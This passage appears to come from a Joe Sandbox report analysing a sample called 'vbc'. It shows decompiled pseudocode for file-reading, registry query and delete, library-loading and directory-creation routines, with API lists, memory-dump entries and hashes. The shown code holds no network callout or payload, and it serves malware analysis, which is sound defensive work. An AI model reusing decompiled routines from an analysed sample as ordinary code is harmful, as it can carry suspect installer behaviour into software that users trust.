                                                • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0040317B(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                				long _v8;
                                                				long _t21;
                                                				long _t22;
                                                				void* _t24;
                                                				long _t26;
                                                				int _t27;
                                                				long _t28;
                                                				void* _t29;
                                                				void* _t30;
                                                				long _t31;
                                                				long _t32;
                                                				long _t36;
                                                
                                                				_t21 = _a4;
                                                				if(_t21 >= 0) {
                                                					_t32 = _t21 +  *0x42a298;
                                                					 *0x418ed4 = _t32;
                                                					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                				}
                                                				_t22 = E00403283(4);
                                                				if(_t22 >= 0) {
                                                					_t24 = E00405E6A( *0x40a01c,  &_a4, 4); // executed
                                                					if(_t24 == 0) {
                                                						L18:
                                                						_push(0xfffffffd);
                                                						goto L19;
                                                					} else {
                                                						 *0x418ed4 =  *0x418ed4 + 4;
                                                						_t36 = E00403283(_a4);
                                                						if(_t36 < 0) {
                                                							L21:
                                                							_t22 = _t36;
                                                						} else {
                                                							if(_a12 != 0) {
                                                								_t26 = _a4;
                                                								if(_t26 >= _a16) {
                                                									_t26 = _a16;
                                                								}
                                                								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                								if(_t27 != 0) {
                                                									_t36 = _v8;
                                                									 *0x418ed4 =  *0x418ed4 + _t36;
                                                									goto L21;
                                                								} else {
                                                									goto L18;
                                                								}
                                                							} else {
                                                								if(_a4 <= 0) {
                                                									goto L21;
                                                								} else {
                                                									while(1) {
                                                										_t28 = _a4;
                                                										if(_a4 >= 0x4000) {
                                                											_t28 = 0x4000;
                                                										}
                                                										_v8 = _t28;
                                                										_t29 = E00405E6A( *0x40a01c, 0x414ed0, _t28); // executed
                                                										if(_t29 == 0) {
                                                											goto L18;
                                                										}
                                                										_t30 = E00405E99(_a8, 0x414ed0, _v8); // executed
                                                										if(_t30 == 0) {
                                                											_push(0xfffffffe);
                                                											L19:
                                                											_pop(_t22);
                                                										} else {
                                                											_t31 = _v8;
                                                											_a4 = _a4 - _t31;
                                                											 *0x418ed4 =  *0x418ed4 + _t31;
                                                											_t36 = _t36 + _t31;
                                                											if(_a4 > 0) {
                                                												continue;
                                                											} else {
                                                												goto L21;
                                                											}
                                                										}
                                                										goto L22;
                                                									}
                                                									goto L18;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L22:
                                                				return _t22;
                                                			}















                                                0x0040317f
                                                0x00403188
                                                0x00403191
                                                0x00403195
                                                0x004031a0
                                                0x004031a0
                                                0x004031a8
                                                0x004031af
                                                0x004031c1
                                                0x004031c8
                                                0x0040326d
                                                0x0040326d
                                                0x00000000
                                                0x004031ce
                                                0x004031d1
                                                0x004031dd
                                                0x004031e1
                                                0x0040327b
                                                0x0040327b
                                                0x004031e7
                                                0x004031ea
                                                0x00403249
                                                0x0040324f
                                                0x00403251
                                                0x00403251
                                                0x00403263
                                                0x0040326b
                                                0x00403272
                                                0x00403275
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031ec
                                                0x004031ef
                                                0x00000000
                                                0x004031f5
                                                0x004031fa
                                                0x00403201
                                                0x00403204
                                                0x00403206
                                                0x00403206
                                                0x00403213
                                                0x00403216
                                                0x0040321d
                                                0x00000000
                                                0x00000000
                                                0x00403226
                                                0x0040322d
                                                0x00403245
                                                0x0040326f
                                                0x0040326f
                                                0x0040322f
                                                0x0040322f
                                                0x00403232
                                                0x00403235
                                                0x0040323b
                                                0x00403241
                                                0x00000000
                                                0x00403243
                                                0x00000000
                                                0x00403243
                                                0x00403241
                                                0x00000000
                                                0x0040322d
                                                0x00000000
                                                0x004031fa
                                                0x004031ef
                                                0x004031ea
                                                0x004031e1
                                                0x004031c8
                                                0x0040327d
                                                0x00403280

                                                APIs
                                                • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004031A0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                • Instruction ID: 40ace49db037ace229a3e5c96781d28ed7fa856bf3440834985399bb1b02b3fc
                                                • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                • Instruction Fuzzy Hash: 65316B30601219EBDF10DFA5ED84ADA3E68FF04799F20417EF905E6190D7788E509BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E0040249D(int* __ebx, char* __esi) {
                                                				void* _t17;
                                                				short* _t18;
                                                				void* _t33;
                                                				void* _t37;
                                                				void* _t40;
                                                
                                                				_t35 = __esi;
                                                				_t27 = __ebx;
                                                				_t17 = E00402D5D(_t40, 0x20019); // executed
                                                				_t33 = _t17;
                                                				_t18 = E00402C53(0x33);
                                                				 *__esi = __ebx;
                                                				if(_t33 == __ebx) {
                                                					 *(_t37 - 4) = 1;
                                                				} else {
                                                					 *(_t37 - 0x50) = 0x800;
                                                					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x50) != 0) {
                                                						L7:
                                                						 *_t35 = _t27;
                                                						 *(_t37 - 4) = 1;
                                                					} else {
                                                						if( *(_t37 + 8) == 4) {
                                                							__eflags =  *(_t37 - 0x18) - __ebx;
                                                							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                                							E00406159(__esi,  *__esi);
                                                						} else {
                                                							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                								 *(_t37 - 4) =  *(_t37 - 0x18);
                                                								_t35[0x7fe] = _t27;
                                                							} else {
                                                								goto L7;
                                                							}
                                                						}
                                                					}
                                                					_push(_t33); // executed
                                                					RegCloseKey(); // executed
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *(_t37 - 4);
                                                				return 0;
                                                			}








                                                0x0040249d
                                                0x0040249d
                                                0x004024a2
                                                0x004024a9
                                                0x004024ab
                                                0x004024b2
                                                0x004024b5
                                                0x004028a1
                                                0x004024bb
                                                0x004024be
                                                0x004024d9
                                                0x00402509
                                                0x00402509
                                                0x0040250c
                                                0x004024db
                                                0x004024df
                                                0x004024f8
                                                0x004024ff
                                                0x00402502
                                                0x004024e1
                                                0x004024e4
                                                0x004024ef
                                                0x00402565
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004024e4
                                                0x004024df
                                                0x0040256c
                                                0x0040256d
                                                0x0040256d
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                  • Part of subcall function 00402D5D: RegOpenKeyExW.KERNEL32 ref: 00402D85
                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024CE
                                                • RegCloseKey.KERNEL32(?), ref: 0040256D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 30b04810283adb96102801c9ea5a0bfc3350ff4b9ed8da539be931810b49eef3
                                                • Instruction ID: 1238864f951968f7a69ddad796cf6f28c2cd02d7cb81d74efa810d70cc71421c
                                                • Opcode Fuzzy Hash: 30b04810283adb96102801c9ea5a0bfc3350ff4b9ed8da539be931810b49eef3
                                                • Instruction Fuzzy Hash: D7115471900205EADB14DFA0CA9C5AE77B4EF04345F21843FE142A72D0D6B88A45DB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4) {
                                                				intOrPtr* _t6;
                                                				void* _t8;
                                                				void* _t10;
                                                				signed int _t11;
                                                				void* _t12;
                                                				signed int _t16;
                                                				signed int _t17;
                                                				void* _t18;
                                                
                                                				_t17 = _a4;
                                                				while(_t17 >= 0) {
                                                					_t6 = _t17 * 0x1c +  *0x42a270;
                                                					if( *_t6 == 1) {
                                                						break;
                                                					}
                                                					_push(_t6); // executed
                                                					_t8 = E00401434(); // executed
                                                					if(_t8 == 0x7fffffff) {
                                                						return 0x7fffffff;
                                                					}
                                                					_t10 = E0040136D(_t8);
                                                					if(_t10 != 0) {
                                                						_t11 = _t10 - 1;
                                                						_t16 = _t17;
                                                						_t17 = _t11;
                                                						_t12 = _t11 - _t16;
                                                					} else {
                                                						_t12 = _t10 + 1;
                                                						_t17 = _t17 + 1;
                                                					}
                                                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                						 *0x42922c =  *0x42922c + _t12;
                                                						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42922c, 0x7530,  *0x429214), 0);
                                                					}
                                                				}
                                                				return 0;
                                                			}











                                                0x0040138a
                                                0x004013fa
                                                0x0040139b
                                                0x004013a0
                                                0x00000000
                                                0x00000000
                                                0x004013a2
                                                0x004013a3
                                                0x004013ad
                                                0x00000000
                                                0x00401404
                                                0x004013b0
                                                0x004013b7
                                                0x004013bd
                                                0x004013be
                                                0x004013c0
                                                0x004013c2
                                                0x004013b9
                                                0x004013b9
                                                0x004013ba
                                                0x004013ba
                                                0x004013c9
                                                0x004013cb
                                                0x004013f4
                                                0x004013f4
                                                0x004013c9
                                                0x00000000

                                                APIs
                                                • MulDiv.KERNEL32 ref: 004013E4
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
                                                • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040238E(void* __ebx) {
                                                				short* _t6;
                                                				long _t8;
                                                				void* _t15;
                                                				long _t19;
                                                				void* _t22;
                                                				void* _t23;
                                                
                                                				_t15 = __ebx;
                                                				_t26 =  *(_t23 - 0x18) - __ebx;
                                                				if( *(_t23 - 0x18) != __ebx) {
                                                					_t6 = E00402C53(0x22);
                                                					_t18 =  *(_t23 - 0x18) & 0x00000002;
                                                					__eflags =  *(_t23 - 0x18) & 0x00000002;
                                                					_t8 = E00402C93(E00402D48( *((intOrPtr*)(_t23 - 0x24))), _t6, _t18); // executed
                                                					_t19 = _t8;
                                                					goto L4;
                                                				} else {
                                                					_t22 = E00402D5D(_t26, 2);
                                                					if(_t22 == __ebx) {
                                                						L6:
                                                						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                					} else {
                                                						_t19 = RegDeleteValueW(_t22, E00402C53(0x33));
                                                						RegCloseKey(_t22);
                                                						L4:
                                                						if(_t19 != _t15) {
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t23 - 4));
                                                				return 0;
                                                			}









                                                0x0040238e
                                                0x0040238e
                                                0x00402391
                                                0x004023c0
                                                0x004023c8
                                                0x004023c8
                                                0x004023d6
                                                0x004023db
                                                0x00000000
                                                0x00402393
                                                0x0040239a
                                                0x0040239e
                                                0x004028a1
                                                0x004028a1
                                                0x004023a4
                                                0x004023b4
                                                0x004023b6
                                                0x004023dd
                                                0x004023df
                                                0x00000000
                                                0x004023e5
                                                0x004023df
                                                0x0040239e
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                  • Part of subcall function 00402D5D: RegOpenKeyExW.KERNEL32 ref: 00402D85
                                                • RegDeleteValueW.ADVAPI32 ref: 004023AD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 004023B6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValue
                                                • String ID:
                                                • API String ID: 849931509-0
                                                • Opcode ID: 808e079856c3e330f988604dba698f7ed65f16814c9e0450fdd811f5c471dab2
                                                • Instruction ID: c0d23e370c25ffca0c370365ac79ff448217ed3cb42859f8984a45efd79f81dd
                                                • Opcode Fuzzy Hash: 808e079856c3e330f988604dba698f7ed65f16814c9e0450fdd811f5c471dab2
                                                • Instruction Fuzzy Hash: A8F0C233A04111ABEB10BBB49B8EAAE72699F40348F11447FF602B71C0C9FC4D428669
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: df02804171275602234b011b42ebcfacee08e398cb8d557c51063b0f7fc8f1ab
                                                • Instruction ID: 50398dcd8f08d813da2dc86a20fdec6a2780ea60cea6e306d4739c988c0027c9
                                                • Opcode Fuzzy Hash: df02804171275602234b011b42ebcfacee08e398cb8d557c51063b0f7fc8f1ab
                                                • Instruction Fuzzy Hash: 15E0D832A08204CFD724DBF4AE8446E73B0EB40318721457FE402F11D0CBF848419B6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004065EC(signed int _a4) {
                                                				struct HINSTANCE__* _t5;
                                                				signed int _t10;
                                                
                                                				_t10 = _a4 << 3;
                                                				_t8 =  *(_t10 + 0x40a410);
                                                				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                				if(_t5 != 0) {
                                                					L2:
                                                					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                				}
                                                				_t5 = E0040657C(_t8); // executed
                                                				if(_t5 == 0) {
                                                					return 0;
                                                				}
                                                				goto L2;
                                                			}





                                                0x004065f4
                                                0x004065f7
                                                0x004065fe
                                                0x00406606
                                                0x00406612
                                                0x00000000
                                                0x00406619
                                                0x00406609
                                                0x00406610
                                                0x00000000
                                                0x00406621
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                  • Part of subcall function 0040657C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                  • Part of subcall function 0040657C: wsprintfW.USER32 ref: 004065CE
                                                  • Part of subcall function 0040657C: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004065E2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                • Instruction ID: aacf951b1eba8b902ff867273acd7254ef5911eae3d9513ed99e50af610fe84a
                                                • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                • Instruction Fuzzy Hash: 44E026326046206BC31047705E0893762AC9FC83003020C3EF502F2044CB789C329EAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E00405DE7(WCHAR* _a4, long _a8, long _a12) {
                                                				signed int _t5;
                                                				void* _t6;
                                                
                                                				_t5 = GetFileAttributesW(_a4); // executed
                                                				asm("sbb ecx, ecx");
                                                				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                				return _t6;
                                                			}





                                                0x00405deb
                                                0x00405df8
                                                0x00405e0d
                                                0x00405e13

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,00402F18,00438800,80000000,00000003), ref: 00405DEB
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405DC2(WCHAR* _a4) {
                                                				signed char _t3;
                                                				signed char _t7;
                                                
                                                				_t3 = GetFileAttributesW(_a4); // executed
                                                				_t7 = _t3;
                                                				if(_t7 != 0xffffffff) {
                                                					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                				}
                                                				return _t7;
                                                			}





                                                0x00405dc7
                                                0x00405dcd
                                                0x00405dd2
                                                0x00405ddb
                                                0x00405ddb
                                                0x00405de4

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DDB
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                • Instruction ID: 952e92710cc69b9b43d0c132b1ebcdc485dc7d738455aa6d22c0503b32111fdc
                                                • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                • Instruction Fuzzy Hash: 9DD0C972504520ABC2112728AE0C89BBB55EB542717028B35FAA9A22B0CB304C568A98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004058BD(WCHAR* _a4) {
                                                				int _t2;
                                                
                                                				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                				if(_t2 == 0) {
                                                					return GetLastError();
                                                				}
                                                				return 0;
                                                			}




                                                0x004058c3
                                                0x004058cb
                                                0x00000000
                                                0x004058d1
                                                0x00000000

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,0040343D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 004058C3
                                                • GetLastError.KERNEL32 ref: 004058D1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
